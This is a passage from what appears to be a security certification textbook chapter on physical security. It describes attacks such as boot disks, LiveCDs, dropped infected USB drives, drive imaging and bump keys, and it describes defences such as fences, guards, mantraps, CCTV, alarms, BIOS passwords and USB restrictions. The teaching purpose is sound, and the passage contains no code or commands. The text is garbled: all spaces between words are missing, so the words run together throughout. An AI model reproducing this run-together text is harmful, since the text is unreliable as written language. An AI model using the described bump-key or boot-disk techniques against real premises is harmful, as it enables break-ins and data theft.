securityofnetworksandinformationsystems.Businessesareresponsibleforsecuringtheirprofitability,whichrequiressecuringacombinationofassets:employees,productinventory,tradesecrets,andstrategyinformation.Theseandotherimportantassetsaffecttheprofitabilityofacompanyanditsfuturesurvival.Companiesthereforeperformmanyactivitiestoattempttoprovidephysicalsecurity—lockingdoors,installingalarmsystems,usingsafes,postingsecurityguards,settingaccesscontrols,andmore.Mostcompaniestodayhaveinvestedalargeamountoftime,money,
andeffortinbothnetworksecurityandinformationsystemssecurity.Inthischapter,youwilllearnabouthowthestrategiesforsecuringthenetworkandforsecuringinformationsystemsarelinked,andyou’lllearnseveralmethodsbywhichcompaniescanminimizetheirexposuretophysicalsecurityeventsthatcandiminishtheirnetworksecurity.
TheSecurityProblemTheproblemthatfacesprofessionalschargedwithsecuringacompany’snetworkcanbestatedrathersimply:physicalaccessnegatesallothersecuritymeasures.Nomatterhowimpenetrablethefirewallandintrusiondetectionsystem(IDS),ifanattackercanfindawaytowalkuptoandtouchaserver,hecanbreakintoit.Considerthatmostnetworksecuritymeasuresare,fromnecessity,
directedatprotectingacompanyfromInternet-basedthreats.Consequently,alotofcompaniesallowanykindoftrafficonthelocalareanetwork(LAN).SoifanattackerattemptstogainaccesstoaserverovertheInternetandfails,hemaybeabletogainphysicalaccesstothereceptionist’smachineand,byquicklycompromisingit,useitasaremotelycontrolledzombietoattackwhatheisreallyafter.Figure8.1illustratestheuseofalower-privilegemachinetoobtainsensitiveinformation.Physicallysecuringinformationassetsdoesn’tmeanjusttheservers;itmeansprotectingphysicalaccesstoalltheorganization’scomputersanditsentirenetworkinfrastructure.
•Figure8.1Usingalower-privilegemachinetogetatsensitiveinformation
Physicalaccesstoacorporation’ssystemscanallowanattackertoperformanumberofinterestingactivities,startingwithsimplypluggingintoanopenEthernetjack.Theadventofhandhelddeviceswiththeabilitytorunoperatingsystemswithfullnetworkingsupporthasmadethisattackscenarioevenmorefeasible.Priortohandhelddevices,theattackerwouldhavetoworkinasecludedareawithdedicatedaccesstotheEthernetforatime.Theattackerwouldsitdownwithalaptopandrunavarietyoftoolsagainstthenetwork,andworkinginternallytypicallyputtheattackerinsidethefirewallandIDS.Today’scapablemobiledevicescanassisttheseeffortsbyallowingattackerstoplacethesmalldeviceontothenetworktoactasawirelessbridge,asshowninFigure8.2.
•Figure8.2Awirelessbridgecanallowremoteaccess.
Theattackercanthenusealaptoptoattackanetworkremotelyviathebridgefromoutsidethebuilding.IfpowerisavailableneartheEthernetjack,thistypeofattackcanalsobeaccomplishedwithanoff-the-shelfaccesspoint.Theattacker’sonlychallengeisfindinganEthernetjackthat
isn’tcoveredbyfurnitureorsomeotherobstruction.Anothersimpleattackthatcanbeusedwhenanattackerhasphysical
accessiscalledabootdisk.AnymediausedtobootacomputerintoanoperatingsystemthatisnotthenativeOSonitsharddrivecouldbeclassifiedasabootdisk.Thesecanbeintheformofafloppydisk,CD,DVD,oraUSBflashdrive.BeforebootableCDsorDVDswereavailable,abootfloppywasusedtostartthesystemandpreparetheharddrivestoloadtheoperatingsystem.Abootsourcecancontainanumberofprograms,butthemosttypicaloneswouldbeNTFSDOSorafloppy-basedLinuxdistributionthatcanbeusedtoperformanumberoftasks,includingmountingtheharddrivesandperformingatleastreadoperations,alldoneviascript.Onceanattackerisabletoreadaharddrive,thepasswordfilecanbecopiedoffthemachineforofflinepassword-crackingattacks.Ifwriteaccesstothedriveisobtained,theattackercouldalterthepasswordfileorplacearemote-controlprogramtobeexecutedautomaticallyuponthenextboot,guaranteeingcontinuedaccesstothemachine.Mostnewmachinesdonotincludefloppydrives,sothisattackisrapidlybeingreplacedbythesameconceptwithaUSBdevice,CD,orDVD.ThemostobviousmitigationistotelltheBIOSnottobootfromremovablemedia,butthistoohasissues.ThebootableCD-ROMsandDVD-ROMsareactuallymoreofathreat,
becausetheyarefrequentlyusedtocarryavarietyofsoftwareforupdatesandcanutilizethemuchgreaterstoragecapacityoftheCDorDVDmedia.Thiscapacitycanstoreanentireoperatingsystemandacompletetoolsetforavarietyoftasksormalware,sowhenupdatingviaCD/DVD,precautionsmustbetakentoensuretheveracityofthemedia.Thereareoperatingsystemdistributionsspecificallydesignedtorunthe
entiremachinefromanopticaldiscwithoutusingtheharddrive.ThesearecommonlyreferredtoasLiveCDs.ALiveCDcontainsabootableversionofanentireoperatingsystem,typicallyavariantofLinux,completewithdriversformostdevices.LiveCDsgiveanattackeragreaterarrayoftoolsthancouldbeloadedontoafloppydisk,suchasscanners,sniffers,vulnerabilityexploits,forensictools,driveimagers,passwordcrackers,
andsoon.Thesesetsoftoolsaretoonumeroustolisthereandarechangingeveryday.ThebestresourceistosearchtheInternetforpopularLiveCDdistributionslikeKali/Backtrack,knoppix,andPHLAK.AsamplecollectionofLiveCDsisshowninFigure8.3.
•Figure8.3AcollectionofsampleLiveCDs
Forexample,withaLiveCDanattackerwouldlikelyhaveaccesstotheharddiskandalsotoanoperationalnetworkinterfacethatwouldallow
himtosendthedrivedataovertheInternetifproperlyconnected.ThesebootableoperatingsystemscouldalsobecustombuilttocontainanytoolthatrunsunderLinux,allowinganattackertobuildastandardbootableattackimageorastandardbootableforensicimage,orsomethingcustomizedforthetoolshelikestouse.BootableUSBflashdrivesemulatethefunctionofaCD-ROMandprovideadevicethatisbothphysicallysmallerandlogicallylarger.CheapUSBflashdrivesarenowcommonlyavailablethatprovidegreaterthan32GBofstorage,withmoreexpensiveversionsstretchingthatcapacityto64,128,andeven256GB.Electronicminiaturizationhasmadethesedevicessmallenoughtobeunnoticed;arecentversionextendsonly5mmfromtheUSBport.Madebootable,thesedevicescancontainentirespecializedoperatingsystems,andunlikeabootableCD-ROM,thesedevicescanalsobewrittento,providinganoffloadpointforcollecteddataifanattackerchoosestoleavethedeviceandreturnlater.
TryThis!CreateaBootdiskBootdisksallowyoutobootacomputertothediskratherthantheOSthatisontheharddrive.Createabootdiskforyourownpersonalcomputer.ThestepsdifferbetweendifferentOSsanddependinguponthemediathatyouwishtomakebootable.PerformalittleresearchtodeterminethecorrectprocedureforyourOSandgiveitatry.MakeabootableCD/DVDorUSBflashdrive.
ThesetypesofdeviceshavespawnedanewkindofattackinwhichaCD,DVD,orflashdriveisleftinanopportunisticplacewheremembersofatargetorganizationmaypickupandusethem.ThisCD/DVDorflashdriveistypicallyloadedwithmalwareandisreferredtoasaroadapple.Theattackreliesoncuriouspeopletoplugthedeviceintotheirworkcomputertoseewhat’sonit.Occasionallytheattackermayalsotrytotemptthepasserbywithenticingdescriptionslike“EmployeeSalaries”orevensomethingassimpleas“Confidential.”OnceauserloadstheCD/DVDorflashdrive,themalwarewillattempttoinfectthemachine.
Driveimagingistheprocessofcopyingtheentirecontentsofaharddrivetoasinglefileonadifferentmedia.Thisprocessisoftenusedbypeoplewhoperformforensicinvestigationsofcomputers.Typically,abootablemediaisusedtostartthecomputerandloadthedriveimagingsoftware.Thissoftwareisdesignedtomakeabit-by-bitcopyoftheharddriveinafileonanothermedia,usuallyanotherharddriveorCD-R/DVD-Rmedia.Driveimagingisusedininvestigationstomakeanexactcopythatcanbeobservedandtakenapart,whilekeepingtheoriginalexactlyasitwasforevidencepurposes.
ExamTip:Driveimagingisathreatbecauseallexistingaccesscontrolstodatacanbebypassedandallthedatastoredonthedrivecanbereadfromtheimage.
Fromanattacker’sperspective,driveimagingsoftwareisusefulbecauseitpullsallinformationfromacomputer’sharddrivewhilestillleavingthemachineinitsoriginalstate.Theinformationcontainseverybitofdatathatisonthecomputer:anylocallystoreddocuments,locallystorede-mails,andeveryotherpieceofinformationthattheharddrivecontains.Thisdatacouldbeveryvaluableifthemachineholdssensitiveinformationaboutthecompany.Physicalaccessisthemostcommonwayofimagingadrive,andthe
biggestbenefitfortheattackeristhatdriveimagingleavesabsolutelynotraceofthecrime.Besidesphysicallysecuringaccesstoyourcomputers,youcandoverylittletopreventdriveimaging,butyoucanminimizeitsimpact.Theuseofencryptionevenforafewimportantfilesprovidesprotection.Fullencryptionofthedriveprotectsallfilesstoredonit.Alternatively,placingfilesonacentralizedfileserverkeepsthemfrombeingimagedfromanindividualmachine,butifanattackerisabletoimagethefileserver,thedatawillbecopied.
CrossCheckForensicImagesWhentakingaforensic-basedimage,itisimportanttofollowproperforensicprocedurestoensuretheevidenceisproperlysecured.ForensicprocessesandproceduresarecoveredindetailinChapter23.
TechTip
EncryptiontoTPM-BasedKeysManycomputersnowcomewithasecuritychipthatfollowstheTrustedPlatformModulestandard.ThisTPMchipallowsforthecreationandstorageofencryptionkeys.Oneofthestrengthsassociatedwiththislevelofsecurityisthatifacopyofadrive,oreventhedriveitself,isstolen,thecontentsareunusablewithoutthekey.Havingthiskeylockedinhardwarepreventshackersfromstealingacopyofthekeyfromamemorylocation.
Adenial-of-service(DoS)attackcanalsobeperformedwithphysicalaccess.Physicalaccesstothecomputerscanbemuchmoreeffectivethananetwork-basedDoSattack.Stealingacomputer,usingabootdisktoerasealldataonthedrives,orsimplyunpluggingcomputersarealleffectiveDoSattacks.Dependingonthecompany’squalityandfrequencyofbackingupcriticalsystems,aDoSattackusingthesemethodscanhavelastingeffects.Physicalaccesscannegatealmostallthesecuritythatthenetwork
attemptstoprovide.Consideringthis,youmustdeterminethelevelofphysicalaccessthatattackersmightobtain.Ofspecialconsiderationarepersonswithauthorizedaccesstothebuildingbutwhoarenotauthorizedusersofthesystems.Janitorialpersonnelandothershaveauthorizedaccesstomanyareas,buttheydonothaveauthorizedsystemaccess.Anattackercouldposeasoneoftheseindividualsorattempttogainaccesstothefacilitiesthroughthem.
PhysicalSecuritySafeguardsWhileitisdifficult,ifnotimpossible,tomakeanorganization’scomputersystemstotallysecure,manystepscanbetakentomitigatetherisktoinformationsystemsfromaphysicalthreat.Thefollowingsectionsdiscussaccesscontrolmethodsandphysicalsecuritypoliciesandproceduresthatshouldbeimplemented.
WallsandGuardsTheprimarydefenseagainstamajorityofphysicalattacksarethebarriersbetweentheassetsandapotentialattacker—walls,fences,gates,anddoors.Someorganizationsalsoemployfull-orpart-timeprivatesecuritystafftoattempttoprotecttheirassets.Thesebarriersprovidethefoundationuponwhichallothersecurityinitiativesarebased,butthesecuritymustbedesignedcarefully,asanattackerhastofindonlyasinglegaptogainaccess.
ExamTip:Allentrypointstoserverroomsandwiringclosetsshouldbecloselycontrolled,and,ifpossible,accessshouldbeloggedthroughanaccesscontrolsystem.
Wallsmayhavebeenoneofthefirstinventionsofman.Oncehelearnedtousenaturalobstaclessuchasmountainstoseparatehimfromhisenemy,henextlearnedtobuildhisownmountainforthesamepurpose.Hadrian’sWallinEngland,theGreatWallofChina,andtheBerlinWallareallfamousexamplesofsuchbasicphysicaldefenses.Thewallsofanybuildingservethesamepurpose,butonasmallerscale:theyprovidebarrierstophysicalaccesstocompanyassets.Bollardsaresmallandroundconcretepillarsthatareconstructedandplacedaroundabuildingtoprotectitfrombeingdamagedbysomeonedrivingavehicleintothesideofthebuilding,orgettingcloseandusingacarbomb.
Toprotectthephysicalservers,youmustlookinalldirections:Doorsandwindowsshouldbesafeguardedandaminimumnumberofeachshouldbeusedinaserverroom.Lessobviousentrypointsshouldalsobeconsidered:Isadropceilingusedintheserverroom?Dotheinteriorwallsextendtotheactualroof,raisedfloors,orcrawlspaces?Accesstotheserverroomshouldbelimitedtothepeoplewhoneedaccess,nottoallemployeesoftheorganization.Ifyouaregoingtouseawalltoprotectanasset,makesurenoobviousholesappearinthatwall.
Anothermethodofpreventingsurreptitiousaccessisthroughtheuseofwindows.Manyhigh-securityareashaveasignificantnumberofwindowssothatpeople’sactivitieswithintheareacan’tbehidden.Aclosedserverroomwithnowindowsmakesforaquietplaceforsomeonetoachievephysicalaccesstoadevicewithoutworryofbeingseen.Windowsremovethisprivacyelementthatmanycriminalsdependupontoachievetheirentryandillicitactivities.Toomanywindowsmakesiteasytoshouldersurf—balanceisthekey,
FencesOutsideofthebuilding’swalls,manyorganizationsprefertohaveaperimeterfenceasaphysicalfirstlayerofdefense.Chain-link-typefencingismostcommonlyused,anditcanbeenhancedwithbarbedwire.Anti-scalefencing,whichlookslikeverytallverticalpolesplacedclosetogethertoformafence,isusedforhigh-securityimplementationsthatrequireadditionalscaleandtamperresistance.Toincreasesecurityagainstphysicalintrusion,higherfencescanbe
employed.Afencethatisthreetofourfeetinheightwilldetercasualoraccidentaltrespassers.Sixtosevenfeetwilldeterageneralintruder.Todetermoredeterminedintruders,aminimumheightofeightfeetisrecommendedwiththeadditionofbarbedwireorrazorwireontopforextremelevelsofdeterrence.
Guards
Guardsprovideanexcellentsecuritymeasure,becauseguardsareavisiblepresencewithdirectresponsibilityforsecurity.Otheremployeesexpectsecurityguardstobehaveacertainwaywithregardtosecuringthefacility.Guardstypicallymonitorentrancesandexitsandcanmaintainaccesslogsofwhohasenteredanddepartedthebuilding.Inmanyorganizations,everyonewhopassesthroughsecurityasavisitormustsignthelog,whichcanbeusefulintracingwhowasatwhatlocationandwhy.
Thebiggerchallengeassociatedwithcapturingsurveillanceactivitiesorotherattemptedbreak-ineffortsistheirclandestinenature.Theseeffortsaredesignedtobeaslowprofileandnonobviousaspossibletoincreasethechancesofsuccess.Trainingandawarenessisnecessarynotjustforsecuritypersonnelbutforallpersonnel.Ifanemployeehearsmultipleextensionsallstartringinginthemiddleofthenight,dotheyknowwhotonotify?Ifasecurityguardnotessuchactivity,howdoesthisinformationgetreportedtothecorrectteam?
Securitypersonnelarehelpfulinphysicallysecuringthemachinesonwhichinformationassetsreside,buttogetthemostbenefitfromtheirpresence,theymustbetrainedtotakeaholisticapproachtosecurity.Thevalueofdatatypicallycanbemanytimesthatofthemachinesonwhichthedataisstored.Securityguardstypicallyarenotcomputersecurityexperts,sotheyneedtobeeducatedaboutthevalueofthedataandbetrainedinnetworksecurityaswellasphysicalsecurityinvolvingusers.Theyarethecompany’seyesandearsforsuspiciousactivity,sothenetworksecuritydepartmentneedstotrainthemtonoticesuspiciousnetworkactivityaswell.Multipleextensionsringinginsequenceduringthenight,computersrebootingallatonce,orstrangepeopleparkedintheparkinglotwithlaptopcomputersareallindicatorsofanetworkattackthatmightbemissedwithoutpropertraining.Manytraditionalphysicalsecuritytoolssuchasaccesscontrolsand
CCTVcamerasystemsaretransitioningfromclosedhardwiredsystemstoEthernet-andIP-basedsystems.Thistransitionopensupthedevicestonetworkattackstraditionallyperformedoncomputers.WithphysicalsecuritysystemsbeingimplementedusingtheIPnetwork,everyonein
physicalsecuritymustbecomesmarteraboutnetworksecurity.
PhysicalAccessControlsandMonitoringPhysicalaccesscontrolmeanscontrolofdoorsandentrypoints.Thedesignandconstructionofalltypesofaccesscontrolsystems,aswellasthephysicalbarrierstowhichtheyaremostcomplementary,arefullydiscussedinothertexts.Here,weexploreafewimportantpointstohelpyousafeguardtheinformationinfrastructure,especiallywhereitmeetswiththephysicalaccesscontrolsystem.Thissectiontalksaboutphysicallocks,layeredaccesssystems,andelectronicaccesscontrolsystems.Italsodiscussesclosedcircuittelevision(CCTV)systemsandtheimplicationsofdifferentCCTVsystemtypes.
LocksLockshavebeendiscussedasaprimaryelementofsecurity.Althoughlockshavebeenusedforhundredsofyears,theirdesignhasnotchangedmuch:ametal“token”isusedtoalignpinsinamechanicaldevice.Asallmechanicaldeviceshavetolerances,itispossibletosneakthroughthesetolerancesby“picking”thelock.Mostlockscanbeeasilypickedwithsimpletools,someofwhichareshowninFigure8.4.
•Figure8.4Lockpickingtools
Aswehumansarealwaystryingtobuildabettermousetrap,high-securitylockshavebeendesignedtodefeatattacks,suchastheoneshowninFigure8.5;theselocksaremoresophisticatedthanastandardhomedeadboltsystem.Typicallyfoundincommercialapplicationsthatrequirehighsecurity,theselocksaremadetoresistpickinganddrilling,aswellasothercommonattackssuchassimplypoundingthelockthroughthedoor.Anothercommonfeatureofhigh-securitylocksiskeycontrol,whichreferstotherestrictionsplacedonmakingacopyofthekey.Formostresidentiallocks,atriptothehardwarestorewillallowyoutomakeacopyofthekey.Keycontrollocksusepatentedkeywaysthatcanonlybecopiedatalocksmith,whowillkeeprecordsonauthorizedusersofaparticularkey.
•Figure8.5Ahigh-securitylockanditskey
High-endlocksecurityismoreimportantnowthatattackssuchas“bumpkeys”arewellknownandwidelyavailable.Abumpkeyisakeycutwithallnotchestothemaximumdepth,alsoknownas“allnines.”Thiskeyusesatechniquethathasbeenaroundalongtime,buthasrecentlygainedalotofpopularity.Thekeyisinsertedintothelockandthensharplystruck,bouncingthelockpinsupabovetheshearlineandallowingthelocktoopen.High-securitylocksattempttopreventthistypeofattackthroughvariousmechanicalmeanssuchasnontraditionalpinlayout,sidebars,andevenmagnetickeys.Otherphysicallocksincludeprogrammableorcipherlocks;lockswitha
keypadthatrequireacombinationofkeystoopenthelock;andlockswithareaderthatrequireanaccesscardtoopenthelock.Thesemayhavespecialoptionssuchasahostagealarm(supportakeycombinationtotriggeranalarm).Master-keying(supportkeycombinationstochangetheaccesscodeandconfigurethefunctionsofthelock)andkey-overridefunctions(supportkeycombinationstooverridetheusualprocedures)arealsooptionsonhigh-endprogrammablelocks.
ExamTip:Layeredaccessisaformofdefenseindepth,aprinciplecomponentofanystrongsecuritysolution.
Devicelocksareusedtolockadevicetoaphysicalrestraint,preventingitsremoval.Anothermethodofsecuringlaptopsandmobiledevicesisacabletrap,whichallowsausertoaffixacablelocktoasecurestructure.
LayeredAccessLayeredaccessisanimportantconceptinsecurity.Itisoftenmentionedinconversationsaboutnetworksecurityperimeters,butinthischapteritrelatestotheconceptofphysicalsecurityperimeters.Tohelppreventanattackerfromgainingaccesstoimportantassets,theseassetsshouldbeplacedinsidemultipleperimeters.Serversshouldbeplacedinaseparatesecurearea,ideallywithaseparateauthenticationmechanism.Forexample,ifanorganizationhasanelectronicdoorcontrolsystemusingcontactlessaccesscards(suchastheexampleshowninFigure8.6)aswellasakeypad,acombinationofthecardandaseparatePINcodewouldberequiredtoopenthedoortotheserverroom.
•Figure8.6Contactlessaccesscardsactasmodernkeystoabuilding.
Accesstotheserverroomshouldbelimitedtostaffwithalegitimateneedtoworkontheservers.Tolayertheprotection,theareasurrounding
theserverroomshouldalsobelimitedtopeoplewhoneedtoworkinthatarea.
ElectronicAccessControlSystemsManyorganizationsuseelectronicaccesscontrolsystemstocontroltheopeningofdoors.Theuseofproximityreadersandcontactlessaccesscardsprovidesuserinformationtothecontrolpanel.Doorwaysareelectronicallycontrolledviaelectronicdoorstrikesandmagneticlocks.Thesedevicesrelyonanelectronicsignalfromthecontrolpaneltoreleasethemechanismthatkeepsthedoorclosed.Thesedevicesareintegratedintoanaccesscontrolsystemthatcontrolsandlogsentryintoallthedoorsconnectedtoit,typicallythroughtheuseofaccesstokens.Securityisimprovedbyhavingacentralizedsystemthatcaninstantlygrantorrefuseaccessbaseduponaccesslistsandthereadingofatokenthatisgiventotheuser.Thiskindofsystemalsologsuseraccess,providingnonrepudiationofaspecificuser’spresenceinacontrolledenvironment.Thesystemwillallowloggingofpersonnelentry,auditingofpersonnelmovements,andreal-timemonitoringoftheaccesscontrols.
ExamTip:Amantrapdoorarrangementcanpreventunauthorizedpeoplefromfollowingauthorizedusersthroughanaccess-controlleddoor,whichisalsoknownas“tailgating.”
Onecautionaboutthesekindsofsystemsisthattheyusuallyworkwithasoftwarepackagethatrunsonacomputer,andassuchthiscomputershouldnotbeattachedtothecompanynetwork.Whileattachingittothenetworkcanalloweasyadministration,thelastthingyouwantisforanattackertohavecontrolofthesystemthatallowsphysicalaccesstoyourfacility.Withthiscontrol,anattackercouldinputtheIDofabadgethatsheowns,allowingfull,legitimateaccesstoanareathesystemcontrols.Anotherproblemwithsuchasystemisthatitlogsonlythepersonwhoinitiallyusedthecardtoopenthedoor—sonologsexistfordoorsthatare
proppedopentoallowothersaccess,orofpeople“tailgating”throughadooropenedwithacard.Theimplementationofamantrapisonewaytocombattailgating.Amantrapcomprisestwodoorscloselyspacedthatrequiretheusertocardthroughoneandthentheothersequentially.Mantrapsmakeitnearlyimpossibletotrailthroughadoorwayundetected—ifyouhappentocatchthefirstdoor,youwillbetrappedinbytheseconddoor.
DoorsDoorstosecuredareasshouldhavecharacteristicstomakethemlessobvious.Theyshouldhavesimilarappearancetotheotherdoorstoavoidcatchingtheattentionofintruders.Securitydoorsshouldbeself-closingandhavenohold-openfeature.Theyshouldtriggeralarmsiftheyareforciblyopenedorhavebeenheldopenforalongperiod.
ExamTip:Afail-soft(orfail-safe)lockisunlockedinapowerinterruption.Afail-securelockislockedinapowerinterruption.
Doorsystems,likemanysystems,havetwodesignmethodologies:fail-safeorfail-secure.Whilefail-safeisacommonenoughphrasetohaveenteredthelexicon,thinkaboutwhatitreallymeans—beingsafewhenasystemfails.Inthecaseoftheseelectronicdoorsystems,fail-safemeansthatthedoorisunlockedshouldpowerfail.Tofail-securemeansthatthesystemwilllockthedoorwhenpowerislost.Thiscanalsoapplywhendoorsystemsaremanuallybypassed.Itisimportanttoknowhoweachdoorwillreacttoasystemfailure,notonlyforsecuritybutalsoforfirecodecompliance,asfail-secureisnotallowedforcertaindoorsinabuilding.
Cameras
Closedcircuittelevision(CCTV)camerasaresimilartothedoorcontrolsystems—theycanbeveryeffective,buthowtheyareimplementedisanimportantconsideration.TheuseofCCTVcamerasforsurveillancepurposesdatesbacktoatleast1961,whencameraswereinstalledintheLondonTransporttrainstation.ThedevelopmentofsmallerandmoresophisticatedcameracomponentsanddecreasingpricesforthecamerashavecausedaboonintheCCTVindustrysincethen.CCTVcamerasareusedtomonitoraworkplaceforsecuritypurposes.
Thesesystemsarecommonplaceinbanksandjewelrystores,placeswithhigh-valuemerchandisethatisattractivetothieves.Astheexpenseofthesesystemsdropped,theybecamepracticalformanymoreindustrysegments.Traditionalcamerasareanalogbasedandrequireavideomultiplexertocombineallthesignalsandmakemultipleviewsappearonamonitor.IP-basedcamerasarechangingthat,asmostofthemarestandaloneunitsviewablethroughawebbrowser,suchasthecamerashowninFigure8.7.
•Figure8.7IP-basedcamerasleverageexistingIPnetworksinsteadofneedingaproprietaryCCTVcable.
TechTip
PTZCamerasPan-tilt-zoom(PTZ)camerasarecamerasthathavethefunctionalitytoenablecameramovementinmultipleaxes,aswellastheabilitytozoominonanitem.Thesecamerasprovideadditionalcapability,especiallyinsituationswherethevideoismonitoredandthe
monitoringstationcanmaneuverthecamera.
TheseIP-basedsystemsaddusefulfunctionality,suchastheabilitytocheckonthebuildingfromtheInternet.Thisnetworkfunctionality,however,makesthecamerassubjecttonormalIP-basednetworkattacks.ADoSattacklaunchedattheCCTVsystemjustasabreak-inisoccurringisthelastthingthatanyonewouldwant(otherthanthecriminals).Forthisreason,IP-basedCCTVcamerasshouldbeplacedontheirownseparatenetworkthatcanbeaccessedonlybysecuritypersonnel.ThesamephysicalseparationappliestoanyIP-basedcamerainfrastructure.Oldertime-lapsetaperecordersareslowlybeingreplacedwithdigitalvideorecorders.Whiletheadvanceintechnologyissignificant,becarefulifandwhenthesedevicesbecomeIP-enabled,sincetheywillbecomeasecurityissue,justlikeeverythingelsethattouchesthenetwork.IfyoudependontheCCTVsystemtoprotectyourorganization’s
assets,carefullyconsidercameraplacementandthetypeofcamerasused.Differentiristypes,focallengths,andcolororinfraredcapabilitiesarealloptionsthatmakeonecamerasuperiortoanotherinaspecificlocation.
AlarmsThereareseveraltypesofalarmsystems.Localalarmsystemsringonlylocally.Acentralstationsystemisonewherealarms(andCCTV)aremonitoredbyacentralstation.Manyalarmswillhaveauxiliaryorsecondaryreportingfunctionstolocalpoliceorfiredepartments.Alarmsworkbyalertingpersonneltothetriggeringofspecificmonitoringcontrols.Typicalcontrolsincludethefollowing:
Drycontactswitchesusemetallicfoiltapeasacontactdetectortodetectwhetheradoororwindowisopened.
Electro-mechanicaldetectionsystemsdetectachangeorbreakinacircuit.Theycanbeusedasacontactdetectortodetectwhetheradoororwindowisopened.
Vibrationdetectionsystemsdetectmovementonwalls,ceiling,floors,andsoforthbyvibration.
Pressurematsdetectwhethersomeoneissteppingonthemat.
Photoelectricorphotometricdetectionsystemsemitabeamoflightandmonitorthebeamtodetectformotionandbreak-in.
Wavepatternmotiondetectorsgeneratemicrowaveorultrasonicwaveandmonitortheemittedwavestodetectformotion.
Passiveinfrareddetectionsystemsdetectchangesofheatwavesgeneratedbyanintruder.
Audiooracoustical-seismicdetectionsystemslistenforchangesinnoiselevels.
Proximitydetectorsorcapacitancedetectorsemitamagneticfieldandmonitorthefieldtodetectanyinterruption.
ConvergenceThereisatrendtoconvergeelementsofphysicalandinformationsecuritytoimproveidentificationofunauthorizedactivityonnetworks.Ifaaccesscontrolsystemisaskedtoapproveaccesstoaninsiderusinganoutsideaddress,yetthephysicalsecuritysystemidentifiesthemasbeinginthebuilding,thenananomalyexistsandshouldbeinvestigated.Thistrendiscalledconvergenceandcansignificantlyimprovedefensesagainstclonedcredentials.
PoliciesandProceduresApolicy’seffectivenessdependsonthecultureofanorganization,soallofthepoliciesmentionedhereshouldbefollowedupbyfunctionalproceduresthataredesignedtoimplementthem.Physicalsecuritypoliciesandproceduresrelatetotwodistinctareas:thosethataffectthecomputersthemselvesandthosethataffectusers.
Tomitigatetherisktocomputers,physicalsecurityneedstobeextendedtothecomputersthemselves.Tocombatthethreatofbootdisks,beginbyremovingordisablingtheabilityofasystemtoautomaticallyplayconnecteddevices,suchasUSBflashdrives.Otheractivitiesthattypicallyrequirephysicalpresenceshouldbeprotected,suchasaccesstoasystem’sBIOSatbootup.
TryThis!ExploringYourBIOSSettingsNexttimeyoubootyourPC,exploretheBIOSsettings.Usually,pressingtheF2keyimmediatelyonpower-upwillallowyoutoentertheBIOSsetupscreens.MostPCswillalsohaveabrieftimewhentheypromptfor“Setup”andgiveakeytopress,mostcommonlyF2,orF12.Exploreelementssuchasthebootorderfordevices,optionsforaddingpasswords,andotheroptions.Forsafety,donotsavechangesunlessyouareabsolutelycertainthatyouwanttomakethosechangesandareawareoftheconsequences.Topreventanattackerfromeditingthebootorder,youshouldsetBIOSpasswords.
BIOSAsafeguardthatcanbeemployedistheremovalofremovablemediadevicesfromthebootsequenceinthecomputer’sBIOS(basicinput/outputsystem).ThespecificsofthisoperationdependontheBIOSsoftwareoftheindividualmachine.ArelatedstepthatmustbetakenistosetaBIOSpassword.NearlyallBIOSsoftwarewillsupportpasswordprotectionthatallowsyoutobootthemachinebutrequiresapasswordtoeditanyBIOSsettings.WhiledisablingtheopticaldriveandsettingaBIOSpasswordarebothgoodmeasures,donotdependonthisstrategyexclusivelybecause,insomecases,BIOSmanufacturerswillhaveadefaultBIOSpasswordthatstillworks.
DependinguponBIOSpasswordsisalsonotaguaranteedsecuritymeasure.Formanymachines,
itistrivialtoremoveandthenreplacetheBIOSbattery,whichwillresettheBIOStothe“nopassword”ordefaultpasswordstate.
UEFIUnifiedExtensibleFirmwareInterface(UEFI)isastandardfirmwareinterfaceforPCs,designedtoreplaceBIOS.SupportedbyMacOSX,Linux(laterversions),andWindows8andbeyond,UEFIofferssomesignificantsecurityadvantages.UEFIhasafunctionalityknownassecureboot,whichallowsonlydigitallysigneddriversandOSloaderstobeusedduringthebootprocess,preventingbootkitattacks.AsUEFIisreplacingBIOS,andhasadditionalcharacteristics,itisimportanttokeeppoliciesandprocedurescurrentwiththeadvancementoftechnology.
ExamTip:USBdevicescanbeusedtoinjectmaliciouscodeontoanymachinetowhichtheyareattached.Theycanbeusedtotransportmaliciouscodefrommachinetomachinewithoutusingthenetwork.
USBUSBportshavegreatlyexpandedusers’abilitytoconnectdevicestotheircomputers.USBportsautomaticallyrecognizeadevicebeingpluggedintothesystemandusuallyworkwithouttheuserneedingtoadddriversorconfiguresoftware.ThishasspawnedalegionofUSBdevices,fromMP3playerstoCDburners.Themostinterestingofthese,forsecuritypurposes,aretheUSBflash
memory–basedstoragedevices.USBdrivekeys,whicharebasicallyflashmemorywithaUSBinterfaceinadevicetypicallyaboutthesizeofyourthumb,provideawaytomovefileseasilyfromcomputertocomputer.WhenpluggedintoaUSBport,thesedevicesautomountandbehavelikeanyotherdriveattachedtothecomputer.Theirsmallsizeandrelativelylargecapacity,coupledwithinstantread-writeability,presentsecurity
problems.Theycaneasilybeusedbyanindividualwithmaliciousintenttoconcealtheremovaloffilesordatafromthebuildingortobringmaliciousfilesintothebuildingandontothecompanynetwork.
Laptopsandtabletsarepopulartargetsforthievesandshouldbelockedinsideadeskwhennotinuse,orsecuredwithspecialcomputerlockdowncables.Ifdesktoptowersareused,usecomputerdesksthatprovideaspaceinwhichtolockthecomputer.Allofthesemeasurescanimprovethephysicalsecurityofthecomputersthemselves,butmostofthemcanbedefeatedbyattackersifusersarenotknowledgeableaboutthesecurityprogramanddonotfollowit.
Inaddition,well-intentioneduserscouldaccidentallyintroducemaliciouscodefromUSBdevicesbyusingthemonaninfectedhomemachineandthenbringingtheinfecteddevicetotheoffice,allowingthemalwaretobypassperimeterprotectionsandpossiblyinfecttheorganization.IfUSBdevicesareallowed,aggressivevirusscanningshouldbeimplementedthroughouttheorganization.ThedevicescanbedisallowedviaActiveDirectorypolicysettingsorwithaWindowsRegistrykeyentry.USBcanalsobecompletelydisabled,eitherthroughBIOSsettingsorbyunloadinganddisablingtheUSBdriversfromusers’machines,eitherofwhichwillstopallUSBdevicesfromworking—however,doingthiscancreatemoretroubleifusershaveUSBkeyboardsandmice.TherearetwocommonwaystodisableUSBsupportinaWindowssystem.Onoldersystems,editingtheRegistrykeyisprobablythemosteffectivesolutionforuserswhoarenotauthorizedtousethesedevices.Onnewersystems,thebestwayisthroughGroupPolicyinadomainorthroughtheLocalSecurityPolicyMMConastand-alonebox.
AutoplayAnotherbootdevicetoconsideristheCD/DVDdrive.Thisdevicecanprobablyalsoberemovedfromordisabledonanumberofmachines.ADVDnotonlycanbeusedasabootdevice,butalsocanbeexploitedvia
